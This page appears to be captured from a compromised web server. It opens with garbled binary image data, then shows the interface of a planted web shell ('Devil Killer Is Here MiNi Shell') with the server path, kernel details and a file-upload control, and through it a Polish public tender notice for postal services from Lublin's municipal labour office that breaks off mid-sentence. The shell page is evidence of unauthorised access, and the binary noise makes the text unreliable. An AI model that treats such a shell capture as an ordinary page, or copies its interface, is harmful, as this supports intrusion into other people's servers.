JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220117/0002173801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Usługi pocztowe </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Urząd Pracy w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431213647</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niecała 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-080</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">814665200</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">814665201</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@mup.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">muplublin.praca.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Usługi pocztowe </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b052d386-7559-11ec-beb3-a2bfa38226ab</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00021738</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-01-17</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00020491/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 usługi pocztowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się za pośrednictwem<br/>miniPortalu https://miniportal.uzp.gov.pl , ePUAPu https://epuap.gov.pl/wps/portal oraz poczty<br/>elektronicznej. 2. Wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za<br/>pośrednictwem dedykowanego formularza dostępnego na ePUAP oraz udostępnionego przez<br/>miniPortal (Formularz do komunikacji), drogą elektroniczną – e-mail: przetarg@mup.lublin.pl. 3. adres strony internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP i konto Wykonawcy na miniPortalu. Wykonawca posiadający konto na<br/>ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza<br/>do komunikacji. 2.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach<br/>korzystania z elektronicznej platformy usług administracji publicznej (ePUAP). Zasady składania ofert<br/>oraz dokumentów składanych wraz z ofertą oraz wymagania techniczne i organizacyjne ich wysyłania<br/>opisane zostały w Instrukcji użytkownika. Wykonawca zobowiązany jest zapoznać się z ww. Instrukcją i<br/>postępować wg zasad w niej wskazanych. Wykonawca ubiegając się o udzielenie zamówienia w<br/>szczególności składając ofertę akceptuje zasady korzystania z systemu miniPortal wskazane w<br/>Instrukcji użytkownika i SWZ. W celu korzystania z systemu miniPortal konieczne jest dysponowanie<br/>przez użytkownika urządzeniem teleinformatycznym z dostępem do sieci Internet. Aplikacja działa tylko<br/>na platformie Windows i wymaga .NET Framework 4.5. W przypadku korzystania z urządzeń<br/>mobilnych oraz Mac lub Linux, dostęp do wszystkich funkcjonalności systemu miniPortal może być<br/>ograniczony. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania<br/>czasu odbioru danych:-specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2,- format danych oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z<br/>kodowaniem UTF-8,-oznaczenia czasu odbioru danych – miniPortal - wszelkie operacje opierają się o<br/>czas serwera i dane zapisywane są z dokładnością co do setnej części sekundy,- integracja z<br/>systemem ePUAP jest wykonana w wykorzystaniem standardowego mechanizmu ePUAP. W<br/>przypadku Wykonawcy wysyłającego wniosek do Zamawiającego, ESP Zamawiającego automatycznie<br/>generuje Rodzaj Urzędowego Poświadczenia Odbioru, czyli Urzędowe Poświadczenie Przedłożenia<br/>(UPP), które jest powiązane z wysyłanym dokumentem. W UPP w sekcji „Dane poświadczenia” jest<br/>zawarta informacja o dacie doręczenia.System dostępny jest za pośrednictwem następujących<br/>przeglądarek internetowych: Microsoft Internet Explorer od wersji 9.0, Mozilla Firefox od wersji 15,<br/>Google Chrome od wersji 20.3. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku” i „Formularza<br/>do komunikacji” wynosi 150 MB. 4. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów<br/>elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz innych<br/>informacji przyjmuje się datę ich przekazania na ePUAP.5. Wykonawca składa ofertę za<br/>pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP<br/>i udostępnionego również na miniPortalu, zgodnie z Instrukcją użytkownika. Funkcjonalność do<br/>zaszyfrowania oferty przez Wykonawcę jest dostępna dla wykonawców na miniPortalu, w szczegółach<br/>danego postępowania. W formularzu oferty Wykonawca zobowiązany jest podać adres skrzynki<br/>ePUAP, na którym prowadzona będzie korespondencja związana z postępowaniem.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem Pani/Pana danych osobowych jest<br/>Miejski Urząd Pracy w Lublinie (zwany dalej MUP w Lublinie) reprezentowany przez Dyrektora MUP w<br/>Lublinie, pod adresem ul. Niecała 14, 20-080 Lublin.2. Z Inspektorem Ochrony Danych MUP w Lublinie<br/>można skontaktować się pod numerem telefonu (81) 466 -52-72, e- mail: iod@mup.lublin.pl lub<br/>listownie na ww. adres siedziby Administratora.3. Pani/Pana dane osobowe są przetwarzane w<br/>następujących celach:a) Zgodnie z art. 6 ust. 1 lit. c) lub f) w celu przeprowadzenia niniejszego<br/>postępowania o udzielenie zamówienia publicznego zgodnie z ustawą z dnia 11 września 2019 r.<br/>Prawo zamówień publicznych;b) Zgodnie z art. 6 ust. 1 lit. c) w związku z realizacją obowiązków<br/>ustawowych wynikających z ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych;c)<br/>Zgodnie z art. 6 ust. 1 lit. b) RODO w celu zawarcia i realizacji umowy, której stroną jest osoba, której<br/>dane dotyczą;d) Zgodnie z art. 6 ust. 1 lit. c) RODO w związku z realizacją obowiązku prawnego<br/>ciążącego na Administratorze, w szczególności wynikającym z ustawy z dnia 14 lipca 1983 r. o<br/>narodowym zasobie archiwalnym i archiwach.4. Pani/Pana dane osobowe mogą zostać przekazane<br/>organom władzy publicznej oraz podmiotom wykonującym zadania publiczne lub działającym na<br/>zlecenie organów władzy publicznej, w zakresie i w celach, które wynikają z przepisów powszechnie<br/>obowiązującego prawa lub innym podmiotom świadczącym usługi Administratorowi na podstawie<br/>podpisanych umów.5. Administrator nie będzie przekazywał danych osobowych do państw trzecich lub<br/>do organizacji międzynarodowej.6. Pani/Pana dane przetwarzane w związku z celami wymienionymi w<br/>pkt 3 lit. a), b) i d) będą przechowywane przez okres prowadzenia postępowania o udzielenie<br/>zamówienia publicznego oraz po jego zakończeniu zgodnie z Instrukcją Kancelaryjną i Jednolitym<br/>Rzeczowym Wykazem Akt MUP w Lublinie (dostęp: https://biuletyn.lublin.eu/mup/sposobyprzyjmowania-<br/>i-zalatwiania-spraw/instrukcja-kancelaryjna,1,1820,1.html) na podstawie ustawy z dnia<br/>14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach. W przypadku przetwarzania Pani/Pana<br/>danych w związku z celami wymienionymi w pkt 3 lit. c) i d) będą one przechowywane przez okres<br/>trwania umowy, okres realizacji umowy oraz wynikających z jej tytułu roszczeń oraz upływu okresu na<br/>jaki została udzielona gwarancja (przysługuje rękojmia). 7. Posiada Pani/Pan prawo do żądania od<br/>Administratora dostępu do swoich danych osobowych na podstawie art. 15 RODO oraz do ich<br/>sprostowania na podstawie art. 16 RODO. Na podstawie art. 18 RODO posiada Pani/Pan prawo żądania od Administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO z tym, że wystąpienie z takim żądaniem nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie<br/>zamówienia publicznego. Ponadto posiada Pani/Pan prawo do sprzeciwu na podstawie art. 21 RODO,<br/>wobec przetwarzania danych osobowych, z wyłączeniem sytuacji gdy podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c) RODO.8. Ma Pani/Pan prawo wniesienia skargi do<br/>organu nadzorczego zajmującego się ochroną danych osobowych, tj. Prezesa Urzędu Ochrony Danych<br/>Osobowych.9. W związku z art. 17 ust. 3 lit. b), d) lub e) RODO nie przysługuje Pani/Panu prawo do<br/>usunięcia danych osobowych oraz prawo do przenoszenia danych osobowych, o którym mowa w art.<br/>20 RODO.10. Administrator przetwarza podane dane osobowe w celu realizacji obowiązku<br/>ustawowego. Podanie danych osobowych jest dobrowolne, lecz odmowa ich podania skutkuje brakiem<br/>możliwości przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz zawarcia i<br/>realizacji umowy.11. Pani/Pana dane osobowe nie będą wykorzystywane do zautomatyzowanego podejmowania decyzji, w tym profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MUP.PKIII.371.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usług pocztowych w obrocie krajowym i zagranicznym w zakresie przyjmowania,<br/>przemieszczania, doręczania przesyłek pocztowych, paczek i ich ewentualnych zwrotów do<br/>Zamawiającego po wyczerpaniu możliwości ich doręczenia lub wydania odbiorcy, w rozumieniu<br/>przepisów ustawy z dnia 23 listopada 2012 r. Prawo pocztowe (t.j. Dz. U. z 2020 poz.1041),<br/>Szacowana planowana liczba przesyłek w okresie obowiązywania umowy :<br/>214 590 000 sztuk. Szczegółowy opis przedmiotu zamówienia określa załacznik Nr 1 do SWZ.<br/>Wykonawca jest zobowiązany wykonać zamówienie przez okres 24 miesięcy licząc od daty<br/>protokolarnego dopuszczenia Wykonawcy przez Zamawiającego do rozpoczęcia świadczenia<br/>usług będących przedmiotem niniejszej umowy, potwierdzonym i podpisanym bez zastrzeżeń<br/>przez przedstawicieli każdej ze stron umowy lub do wyczerpania środków finansowych w<br/>zależności, które z tych zdarzeń nastąpi jako pierwsze.<br/>Rozpoczęcie świadczenia usług, nastąpi nie później niż w terminie 8 tygodni od daty podpisania<br/>umowy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">64110000-0 - Usługi pocztowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">64112000-4 - Usługi pocztowe dotyczące listów</p> <p class="mb-0">64113000-1 - Usługi pocztowe dotyczące paczek</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących<br/>kryteriów oceny ofert:<br/>a) Kryterium „cena”: waga 60%<br/>b) Kryterium „możliwości śledzenia przesyłek online”: waga 40%<br/>a) Wartość punktowa kryterium „cena” (C):<br/>C = Cn / Co x 100 pkt x 60 %<br/>gdzie:<br/>Cn - najniższa ofertowa cena brutto spośród ocenianych ważnych ofert<br/>Co - cena oferty ocenianej<br/>Wykonawca może otrzymać w tym kryterium maksymalnie 60 punktów.<br/>b) Wartość punktowa kryterium „możliwość śledzenia online” przesyłek rejestrowanych w obrocie<br/>krajowym i zagranicznym bez dodatkowych kosztów z tym związanych przez Zamawiającego -<br/>usługa powinna być ogólnie dostępna dla Zamawiającego bez konieczności zakupu<br/>dodatkowego sprzętu, oprogramowania, uprawnień itp.) – P.<br/>Maksymalna możliwa do uzyskania liczba punktów 40.<br/>Waga –40%<br/>Dla tego kryterium punkty zostaną przyznane w następujący sposób:<br/>1. Wykonawca, który zaoferuje możliwość śledzenia online przesyłek rejestrowanych w obrocie<br/>krajowym i zagranicznym bez dodatkowych kosztów z tym związanych przez Zamawiającego<br/>(usługa powinna być ogólnie dostępna dla Zamawiającego bez konieczności zakupu<br/>dodatkowego sprzętu, oprogramowania, uprawnień itp.) otrzyma 40,00 pkt,<br/>2. Wykonawca, który nie zaoferuje możliwości śledzenia online przesyłek rejestrowanych w<br/>obrocie krajowym i zagranicznym bez dodatkowych kosztów z tym związanych przez<br/>Zamawiającego (usługa powinna być ogólnie dostępna dla Zamawiającego bez konieczności<br/>zakupu dodatkowego sprzętu, oprogramowania, uprawnień itp.) otrzyma 0 pkt.<br/>Brak określenia w części B w pkt 5 Formularza oferty w miejscu w zakresie oferowanego / nie<br/>oferowanego śledzenia przesyłki będzie traktowane jakby Wykonawca wpisał „ Nie oferuję” i<br/>otrzyma 0 pkt w tym kryterium.<br/>3. Za najkorzystniejszą zostanie uznana oferta, która nie podlega odrzuceniu i uzyska<br/>największą liczbę punktów wg wzoru: Liczba punktów = C + P, gdzie:<br/>C oznacza liczbę punktów uzyskanych przez ofertę w kryterium ceny oferty,<br/>P oznacza liczbę punktów uzyskanych przez ofertę w kryterium możliwość śledzenia online przesyłek rejestrowanych w obrocie krajowym i zagranicznym bez dodatkowych kosztów z tym<br/>związanych przez Zamawiającego.<br/>Maksymalna łączna suma punktów możliwych do uzyskania - 100 punktów.<br/>Ciąg dalszy w sekcji IX-Pozostałe informacje.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kryterium&#34;możliwość śledzenia online&#34; przesyłek rejestrowanych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki udziału w<br/>postępowaniu dotyczące:<br/>1.1. Zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie określa warunku w ww. zakresie.<br/>1.2. Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile<br/>wynika to z odrębnych przepisów;<br/>Wykonawca spełni ten warunek, jeżeli posiada uprawnienia do wykonywania działalności<br/>pocztowej na obszarze Rzeczpospolitej Polskiej oraz zagranicą, tzn. jest wpisany do rejestru<br/>operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej,<br/>zgodnie z art. 6 ustawy Prawo pocztowe .<br/>1.3. Sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie określa warunku w ww. zakresie<br/>1.4. Zdolności technicznej lub zawodowej w zakresie:<br/>Wykonawca spełni ten warunek jeżeli: posiada doświadczenie tj. wykaże, że należycie wykonał,<br/>a w przypadku świadczeń powtarzających się lub ciągłych również należycie wykonuje, w<br/>okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, co najmniej jedną usługę pocztową w zakresie<br/>przyjmowania, przemieszczania, doręczania przesyłek pocztowych i ich zwrotów o wartości co<br/>najmniej 400 000,00 zł brutto każda i przedstawi dowody, czy zostały wykonane lub są<br/>wykonywane należycie.<br/>W przypadku usług nadal wykonywanych faktycznie zrealizowany zakres zamówienia na dzień<br/>składania ofert musi spełniać warunki określone powyżej. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust.1 pkt 5 ustawy, o braku przynależności do tej<br/>samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020r. poz.1076 i 1086) z innym wykonawcą, który złożył odrębną ofertę, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami,<br/>potwierdzającymi przygotowanie oferty niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – zgodnie z załącznikiem nr 6 do niniejszej SWZ;<br/>b) oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego – zgodnie z załącznikiem Nr 7 do niniejszej SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania warunków udziału w postępowaniu:<br/>a) dotyczących wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej:<br/>potwierdzenia wpisu do rejestru działalności regulowanej tj. aktualnego wpisu do rejestru operatorów<br/>pocztowych prowadzonego na podstawie art. 6 ustawy Prawo pocztowe b) dotyczących zdolności technicznej lub zawodowej:<br/>wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie 